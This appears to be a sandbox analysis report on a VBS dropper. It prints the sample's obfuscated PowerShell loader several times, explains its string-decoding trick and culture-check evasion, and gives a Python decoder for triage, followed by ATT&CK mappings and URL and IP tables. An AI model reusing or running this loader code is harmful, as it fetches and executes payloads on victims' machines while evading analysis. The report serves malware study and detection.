$mjavende;$kngtende+=3){$aflytningsudstyrene+=$takkende.$neocortical.invoke( $kngtende, $reinvigorate);}$aflytningsudstyrene;}function convictively($mispainted){ . ($aabningstid) ($mispainted);}$lignings=reeling ' ,mhwo,ozscicolp,lkiaov/sh5f..ta0en f(sew ainontcdciob,wh,ste fln ktsk fi1.y0fo.c 0ly;u. ,wstispn l6be4ei; , .kx u6 ,4,i;in lorinvun: a1ac2ag1f .be0,i)af ,og aesickakdeo s/sk2ir0ny1ol0ou0op1fl0sa1k, defreireryderafeso,axop/ u1 s2 ,1sk.be0m, ';$triatomicity=reeling 'inup s,ue srca-noaoeg iefinvat a ';$undgldes=reeling ' fh at,etcep ks p:in/dr/sed,lrt,io.vsuech. vgvao ,opegbalcaee .lecfros,m.a/m.u ecse?b,e,hx npdioa,r.atln=podwaor.ws,ngol gos a.rd t&f,isjdst= p1anx swobi.ar rdiel,g ytafx .8ude ,qpuutii.semazwhqse- fqt.rla9prkstkmehre3prqmuyaf6 ,a digos.gxsu ';$alytes=reeling ' g>p. ';$aabningstid=reeling ',ris.e axes ';$proboscidiferous='betoningerne';$friluftsmenneskerne = reeling ' uenyci.h,ro . 
p%una mpgop.nd.oa,rtomad.%za\agnsporenzic,hos nhaga,egesdrta,im ob.nha.a fraorer.e la&ta&se baeinca.hunopr sntns ';convictively (reeling 'di$tigfoltuowab ea olha:,lf u vs hesttta=a ( ccsumtrdps ho/encf. u$ rf .r .i ,leuu uf vtstsspmdee fnsunfaearsrokovegyrfan ,e .) ');convictively (reeling 're$.egb l iob.bplapil s: r,oi mvenin nini .afanfo=sp$aiucyn tdcag.pl rdreehysno.syscopirl .isyt .( $olaiml,hygrt ue es s) ');convictively (reeling 'd,[glnk.ekatsu.oxs sekerkov.oi.aco e fpheok i,onpet .mbaabln ,a gelebir u]bl:c.:sqsste.eck.ubarn,ipit y bpner eo ftf ozycpuo tl.n r =dr ca[dintrekrtdy.u,smeerecsuufrru iint iyscpb rexo.st o pclaoqultrtalybopste l] v:tu:,ft mlm sb,1y 2 u ');$undgldes=$rivinian[0];$rengringsmidlets= (reeling 'pu$q,gbal ,olubp.an,lpi:meom,phags.rvea.ivgues.= ,n neryw .-,lo db bj menocaptde fss.yposudtc,egom.d.hvn seint o.g.wspe obh cm,laliwoe n at');$rengringsmidlets+=$fuset[1];convictively ($rengringsmidlets);convictively (reeling 'no$s,ob.pbagmor.aaf vboe x.,ehsketrakddtae .ra,s s[be$got,arm,ibiaknt ko sm ritic.ri ft yde]l.=f.$ blafipogarnf,i anelgovsfo ');$promachos=reeling ' s$oso ,p ggcoru,agsvskek,.frdino ,wprnb,lofo rakadgaf,ni
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'aflytningsudstyrene sortkridtstegningerne myoparalysis rivinian undgldes chowtime anodynia betoningerne blyantstegninger frydefuld whacker prvekrt kendemrket fjernsynets oligocarpous hawkshaws underlegenhedsflelserne sortspttes boleroers opklares kamsin archin intetanendes exhaustibility aflytningsudstyrene sortkridtstegningerne myoparalysis rivinian undgldes chowtime anodynia betoningerne blyantstegninger frydefuld whacker prvekrt kendemrket fjernsynets oligocarpous hawkshaws underlegenhedsflelserne sortspttes boleroers opklares kamsin archin intetanendes exhaustibility';if (${host}.currentculture) {$reinvigorate++;}function reeling($takkende){$mjavende=$takkende.length-$reinvigorate;$neocortical='substri';$neocortical+='ng';for( $kngtende=2;$kngtende -lt $mjavende;$kngtende+=3){$aflytningsudstyrene+=$takkende.$neocortical.invoke( $kngtende, $reinvigorate);}$aflytningsudstyrene;}function convictively($mispainted){ . ($aabningstid) ($mispainted);}$lignings=reeling ' ,mhwo,ozscicolp,lkiaov/sh5f..ta0en f(sew ainontcdciob,wh,ste fln ktsk fi1.y0fo.c 0ly;u. ,wstispn l6be4ei; , .kx u6 ,4,i;in lorinvun: a1ac2ag1f .be0,i)af ,og aesickakdeo s/sk2ir0ny1ol0ou0op1fl0sa1k, defreireryderafeso,axop/ u1 s2 ,1sk.be0m, ';$triatomicity=reeling 'inup s,ue srca-noaoeg iefinvat a ';$undgldes=reeling ' fh at,etcep ks p:in/dr/sed,lrt,io.vsuech. vgvao ,opegbalcaee .lecfros,m.a/m.u ecse?b,e,hx npdioa,r.atln=podwaor.ws,ngol gos a.rd t&f,isjdst= p1anx swobi.ar rdiel,g ytafx .8ude ,qpuutii.semazwhqse- fqt.rla9prkstkmehre3prqmuyaf6 ,a digos.gxsu ';$alytes=reeling ' g>p. ';$aabningstid=reeling ',ris.e axes ';$proboscidiferous='betoningerne';$friluftsmenneskerne = reeling ' uenyci.h,ro . 
p%una mpgop.nd.oa,rtomad.%za\agnsporenzic,hos nhaga,egesdrta,im ob.nha.a fraorer.e la&ta&se baeinca.hunopr sntns ';convictively (reeling 'di$tigfoltuowab ea olha:,lf u vs hesttta=a ( ccsumtrdps ho/encf. u$ rf .r .i ,leuu uf vtstsspmdee fnsunfaearsrokovegyrfan ,e .) ');convictively (reeling 're$.egb l iob.bplapil s: r,oi mvenin nini .afanfo=sp$aiucyn tdcag.pl rdreehysno.syscopirl .isyt .( $olaiml,hygrt ue es s) ');convictively (reeling 'd,[glnk.ekatsu.oxs sekerkov.oi.aco e fpheok i,onpet .mbaabln ,a gelebir u]bl:c.:sqsste.eck.ubarn,ipit y bpner eo ftf ozycpuo tl.n r =dr ca[dintrekrtdy.u,smeerecsuufrru iint iyscpb rexo.st o pclaoqultrtalybopste l] v:tu:,ft mlm sb,1y 2 u ');$undgldes=$rivinian[0];$rengringsmidlets= (reeling 'pu$q,gbal ,olubp.an,lpi:meom,phags.rvea.ivgues.= ,n neryw .-,lo db bj menocaptde fss.yposudtc,egom.d.hvn seint o.g.wspe obh cm,laliwoe n at');$rengringsmidlets+=$fuset[1];convictively ($rengringsmidlets);convictively (reeling 'no$s,ob.pbagmor.aaf vboe x.,ehsketrakddtae .ra,s s[be$got,arm,ibiaknt ko sm ritic.ri ft yde]l.=f.$ blafipogarnf,i anelgovsfo ');$promachos=reeling ' s$oso ,p ggcoru,agsvskek,.frdino ,wprnb,lofo rakadgaf,ni
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'aflytningsudstyrene sortkridtstegningerne myoparalysis rivinian undgldes chowtime anodynia betoningerne blyantstegninger frydefuld whacker prvekrt kendemrket fjernsynets oligocarpous hawkshaws underlegenhedsflelserne sortspttes boleroers opklares kamsin archin intetanendes exhaustibility aflytningsudstyrene sortkridtstegningerne myoparalysis rivinian undgldes chowtime anodynia betoningerne blyantstegninger frydefuld whacker prvekrt kendemrket fjernsynets oligocarpous hawkshaws underlegenhedsflelserne sortspttes boleroers opklares kamsin archin intetanendes exhaustibility';if (${host}.currentculture) {$reinvigorate++;}function reeling($takkende){$mjavende=$takkende.length-$reinvigorate;$neocortical='substri';$neocortical+='ng';for( $kngtende=2;$kngtende -lt $mjavende;$kngtende+=3){$aflytningsudstyrene+=$takkende.$neocortical.invoke( $kngtende, $reinvigorate);}$aflytningsudstyrene;}function convictively($mispainted){ . ($aabningstid) ($mispainted);}$lignings=reeling ' ,mhwo,ozscicolp,lkiaov/sh5f..ta0en f(sew ainontcdciob,wh,ste fln ktsk fi1.y0fo.c 0ly;u. ,wstispn l6be4ei; , .kx u6 ,4,i;in lorinvun: a1ac2ag1f .be0,i)af ,og aesickakdeo s/sk2ir0ny1ol0ou0op1fl0sa1k, defreireryderafeso,axop/ u1 s2 ,1sk.be0m, ';$triatomicity=reeling 'inup s,ue srca-noaoeg iefinvat a ';$undgldes=reeling ' fh at,etcep ks p:in/dr/sed,lrt,io.vsuech. vgvao ,opegbalcaee .lecfros,m.a/m.u ecse?b,e,hx npdioa,r.atln=podwaor.ws,ngol gos a.rd t&f,isjdst= p1anx swobi.ar rdiel,g ytafx .8ude ,qpuutii.semazwhqse- fqt.rla9prkstkmehre3prqmuyaf6 ,a digos.gxsu ';$alytes=reeling ' g>p. ';$aabningstid=reeling ',ris.e axes ';$proboscidiferous='betoningerne';$friluftsmenneskerne = reeling ' uenyci.h,ro . 
p%una mpgop.nd.oa,rtomad.%za\agnsporenzic,hos nhaga,egesdrta,im ob.nha.a fraorer.e la&ta&se baeinca.hunopr sntns ';convictively (reeling 'di$tigfoltuowab ea olha:,lf u vs hesttta=a ( ccsumtrdps ho/encf. u$ rf .r .i ,leuu uf vtstsspmdee fnsunfaearsrokovegyrfan ,e .) ');convictively (reeling 're$.egb l iob.bplapil s: r,oi mvenin nini .afanfo=sp$aiucyn tdcag.pl rdreehysno.syscopirl .isyt .( $olaiml,hygrt ue es s) ');convictively (reeling 'd,[glnk.ekatsu.oxs sekerkov.oi.aco e fpheok i,onpet .mbaabln ,a gelebir u]bl:c.:sqsste.eck.ubarn,ipit y bpner eo ftf ozycpuo tl.n r =dr ca[dintrekrtdy.u,smeerecsuufrru iint iyscpb rexo.st o pclaoqultrtalybopste l] v:tu:,ft mlm sb,1y 2 u ');$undgldes=$rivinian[0];$rengringsmidlets= (reeling 'pu$q,gbal ,olubp.an,lpi:meom,phags.rvea.ivgues.= ,n neryw .-,lo db bj menocaptde fss.yposudtc,egom.d.hvn seint o.g.wspe obh cm,laliwoe n at');$rengringsmidlets+=$fuset[1];convictively ($rengringsmidlets);convictively (reeling 'no$s,ob.pbagmor.aaf vboe x.,ehsketrakddtae .ra,s s[be$got,arm,ibiaknt ko sm ritic.ri ft yde]l.=f.$ blafipogarnf,i anelgovsfo ');$promachos=reeling ' s$oso ,p ggcoru,agsvskek,.frdino ,wprnb,lofo rakadgaf,niJump to behavior
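The wscript-to-powershell chain above hides every meaningful string behind the Reeling function visible in the command line: a literal is walked from index 2 in steps of 3, each step appending Substring(i, $reinvigorate), so only every third character is real and the two before it are filler cut from Danish words. $reinvigorate is incremented only if ${host}.CurrentCulture is truthy; where that check fails the width stays $null, every Substring returns an empty string, and the script decodes to nothing, which is why the culture probe doubles as an anti-analysis gate. Convictively then dot-sources its argument through $Aabningstid, which itself decodes to iex (Invoke-Expression). The Python below is an added triage helper written for this page, not code from the sample, from GuLoader or from the Joe Sandbox report; it re-implements Reeling with the same loop bound and width rule, adds the inverse for building test vectors, and decodes the three short literals copied verbatim from the command line above ($Triatomicity, $Alytes, $Aabningstid). The regular expression, the function names and the constructed SAMPLE_SNIPPET are assumptions for the demonstration. One caveat: several Danish filler words on this page have lost their æ/ø/å characters in extraction (Undgldes, Prvekrt, Kendemrket), so the longer literals here (the browser user agent, the download URL) are missing filler bytes and do not decode cleanly from the page text; the three literals used below are intact.

```python
import re

# Obfuscated literals copied verbatim from the powershell.exe command line in this
# report (variable name -> the string passed to Reeling). These are NOT constructed.
PAGE_LITERALS = {
    "Triatomicity": "InUP s,ue SrCa-NoAOeg iefinVat a ",  # decodes to an HTTP header name
    "Alytes": " G>P. ",                                   # decodes to a redirect operator
    "Aabningstid": ",riS.e axEs ",                         # decodes to the cmdlet Convictively dot-sources
}

# Constructed snippet (assumption, not on the page) that wires the literals together
# the way the sample's command line does, so the extractor has realistic input.
SAMPLE_SNIPPET = (
    f"$Triatomicity=Reeling '{PAGE_LITERALS['Triatomicity']}';"
    f"$Alytes=Reeling '{PAGE_LITERALS['Alytes']}';"
    f"$Aabningstid=Reeling '{PAGE_LITERALS['Aabningstid']}';"
    "function Convictively($Mispainted){ . ($Aabningstid) ($Mispainted);}"
)


def reeling_decode(s: str, width: int = 1, start: int = 2, step: int = 3) -> str:
    """Re-implementation of the sample's Reeling($Takkende).

    Original logic: $Mjavende = $Takkende.Length - $reinvigorate;
    for ($i = 2; $i -lt $Mjavende; $i += 3) { $out += $Takkende.Substring($i, $reinvigorate) }

    `width` mirrors $reinvigorate. It is 1 only after the `${host}.CurrentCulture`
    check succeeds; pass width=0 to reproduce a host where the check fails, in which
    case every Substring is empty and the decoded payload is "".
    """
    limit = len(s) - width
    out = []
    i = start
    while i < limit:
        out.append(s[i:i + width])
        i += step
    return "".join(out)


def reeling_encode(plain: str, filler: str = "xy") -> str:
    """Inverse of reeling_decode, for building test vectors: two filler characters
    precede each real character, and two trailing filler characters satisfy the
    `i < Length - 1` loop bound for the last real character."""
    pad = filler[:2]
    return "".join(pad + ch for ch in plain) + pad


# The sandbox shows both the original and a lower-cased copy of the command line,
# so the match is case-insensitive. Literals in this sample contain no quotes.
REELING_CALL = re.compile(r"reeling\s+'([^']*)'", re.IGNORECASE)


def decode_reeling_calls(command_line: str, width: int = 1) -> list:
    """Decode every `Reeling '<literal>'` argument in a PowerShell command line,
    in order of appearance."""
    return [reeling_decode(m.group(1), width) for m in REELING_CALL.finditer(command_line)]


if __name__ == "__main__":
    for name, literal in PAGE_LITERALS.items():
        print(f"${name} = {reeling_decode(literal)!r}")
    print("all Reeling calls in snippet:", decode_reeling_calls(SAMPLE_SNIPPET))
    print("with CurrentCulture check failed:",
          repr(reeling_decode(PAGE_LITERALS["Aabningstid"], width=0)))
```

Run against the full command line from the report rather than the snippet, the same extractor yields the decoded strings in execution order, which is usually enough to recover the download URL, the User-Agent and the staging path without ever executing the script; where a literal comes back with shifted or missing characters, suspect lost non-ASCII filler in the copy you are working from rather than a different encoding scheme.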
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (7 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (9 occurrences)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\wscript.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
ATT&CK matrix (leading digits are the report's hit-count badges, kept as extracted):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 121 Scripting | Valid Accounts | 1 Windows Management Instrumentation | 121 Scripting | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 1 Security Software Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 21 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 DLL Side-Loading | 21 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 21 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 2 Obfuscated Files or Information | LSA Secrets | 13 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Software Packing | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Source | Detection | Scanner | Label
2669976595_366408723_KHI_SOF_240702_0957_P.vbs | 3% | ReversingLabs | Win32.Dropper.Generic
No Antivirus matches (reported for two further scan categories)
Source | Detection | Scanner
drive.usercontent.google.com | 1% | Virustotal
drive.google.com | 0% | Virustotal
windowsupdatebg.s.llnwi.net | 0% | Virustotal
Source | Detection | Scanner | Label
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://drive.usercontent.googh | 0% | URL Reputation | safe
https://aka.ms/pscore6lB | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
https://apis.google.com | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://drive.usercontent.google.com | 0% | Avira URL Cloud | safe
https://drive.goog | 0% | Avira URL Cloud | safe
https://drive.google.com/uc?ex | 0% | Avira URL Cloud | safe
https://drive.google.com/u | 0% | Avira URL Cloud | safe
https://drive.usercontent.google.comh | 0% | Avira URL Cloud | safe
https://drive.goog | 1% | Virustotal |
https://drive.googP | 0% | Avira URL Cloud | safe
http://drive.usercontent.google.com | 1% | Virustotal |
http://drive.google.com | 0% | Avira URL Cloud | safe
https://drive.google.com/uc?ex | 2% | Virustotal |
https://drive.google. | 0% | Avira URL Cloud | safe
https://drive.go | 0% | Avira URL Cloud | safe
https://drive.google.com/u | 0% | Virustotal |
https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe
https://drive.goo | 0% | Avira URL Cloud | safe
https://www.google.com | 0% | Avira URL Cloud | safe
https://drive.g | 0% | Avira URL Cloud | safe
https://www.google.com | 0% | Virustotal |
https://drive.google. | 0% | Virustotal |
https://github.com/Pester/Pester | 1% | Virustotal |
http://drive.google.com | 0% | Virustotal |
https://drive.google.com/uc | 0% | Avira URL Cloud | safe
http://crl.micro | 0% | Avira URL Cloud | safe
https://drive.goo | 0% | Virustotal |
https://drive.google.com/ | 0% | Avira URL Cloud | safe
https://drive.googl | 0% | Avira URL Cloud | safe
https://drive.google.com/uc?e | 0% | Avira URL Cloud | safe
https://drive.google.com | 0% | Avira URL Cloud | safe
https://drive.usercontent.google.com | 0% | Avira URL Cloud | safe
https://drive.google.c | 0% | Avira URL Cloud | safe
http://crl.microsoftuP | 0% | Avira URL Cloud | safe
https://drive.google.com/uc? | 0% | Avira URL Cloud | safe
https://drive.google.com/uc?e | 2% | Virustotal |
https://drive.google.com/uc | 1% | Virustotal |
https://drive.google.com | 1% | Virustotal |
https://drive.usercontent.google.com | 1% | Virustotal |
https://drive.google | 0% | Avira URL Cloud | safe
https://drive.google.com/uc? | 0% | Virustotal |
https://drive.google.co | 0% | Avira URL Cloud | safe
https://drive.google.co | 0% | Virustotal |
https://drive.google | 0% | Virustotal |
https://drive.google.com/ | 1% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
drive.google.com | 142.250.186.78 | true | false | | unknown
drive.usercontent.google.com | 142.250.186.161 | true | false | | unknown
windowsupdatebg.s.llnwi.net | 87.248.204.0 | true | false | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000009.00000002.2708061147.00000247F39E9000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000D.00000002.2666861261.00000000060E1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://drive.usercontent.google.com | powershell.exe, 00000009.00000002.2663304130.00000247E578C000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal 1%; Avira URL Cloud: safe | unknown
https://drive.goog | powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal 1%; Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000D.00000002.2662155964.00000000051D6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000D.00000002.2662155964.00000000051D6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://drive.google.com/uc?ex | powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal 2%; Avira URL Cloud: safe | unknown
https://drive.google.com/u | powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal 0%; Avira URL Cloud: safe | unknown
https://go.micro | powershell.exe, 00000009.00000002.2663304130.00000247E4C01000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://drive.usercontent.google.comh | powershell.exe, 00000009.00000002.2663304130.00000247E3E49000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/License | powershell.exe, 0000000D.00000002.2666861261.00000000060E1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 0000000D.00000002.2666861261.00000000060E1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://drive.googP | powershell.exe, 00000009.00000002.2663304130.00000247E574F000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://drive.usercontent.googh | powershell.exe, 00000009.00000002.2663304130.00000247E5779000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://drive.google.com | powershell.exe, 00000009.00000002.2663304130.00000247E5752000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal 0%; Avira URL Cloud: safe | unknown
https://drive.google. | powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal 0%; Avira URL Cloud: safe | unknown
https://drive.go | powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 0000000D.00000002.2662155964.00000000051D6000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal 1%; Avira URL Cloud: safe | unknown
https://drive.goo | powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal 0%; Avira URL Cloud: safe | unknown
https://www.google.com | powershell.exe, 00000009.00000002.2663304130.00000247E5779000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000009.00000002.2663304130.00000247E3E45000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000009.00000002.2663304130.00000247E5775000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal 0%; Avira URL Cloud: safe | unknown
https://drive.g | powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://drive.google.com/uc | powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal 1%; Avira URL Cloud: safe | unknown
http://crl.micro | powershell.exe, 0000000D.00000002.2673202295.0000000007BA0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore6lB | powershell.exe, 0000000D.00000002.2662155964.0000000005081000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://drive.google.com/ | powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal 1%; Avira URL Cloud: safe | unknown
https://drive.googl | powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://drive.google.com/uc?e | powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal 2%; Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 0000000D.00000002.2666861261.00000000060E1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000009.00000002.2708061147.00000247F39E9000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000D.00000002.2666861261.00000000060E1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://drive.google.com | powershell.exe, 00000009.00000002.2663304130.00000247E3DEF000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000009.00000002.2663304130.00000247E56F3000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal 1%; Avira URL Cloud: safe | unknown
https://drive.usercontent.google.com | powershell.exe, 00000009.00000002.2663304130.00000247E5779000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal 1%; Avira URL Cloud: safe | unknown
https://drive.google.c | powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000009.00000002.2663304130.00000247E3981000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://apis.google.com | powershell.exe, 00000009.00000002.2663304130.00000247E5779000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000009.00000002.2663304130.00000247E3E45000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000009.00000002.2663304130.00000247E5775000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.microsoftuP | powershell.exe, 0000000D.00000002.2673202295.0000000007C53000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://drive.google.com/uc? | powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal 0%; Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000009.00000002.2663304130.00000247E3981000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000D.00000002.2662155964.0000000005081000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://drive.google | powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal 0%; Avira URL Cloud: safe | unknown
https://drive.google.co | powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal 0%; Avira URL Cloud: safe | unknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IP | Domain | Country | ASN | ASN Name | Malicious
            142.250.186.78 | drive.google.com | United States | 15169 | GOOGLEUS | false
            142.250.186.161 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1466659
            Start date and time:2024-07-03 08:51:56 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 5m 57s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
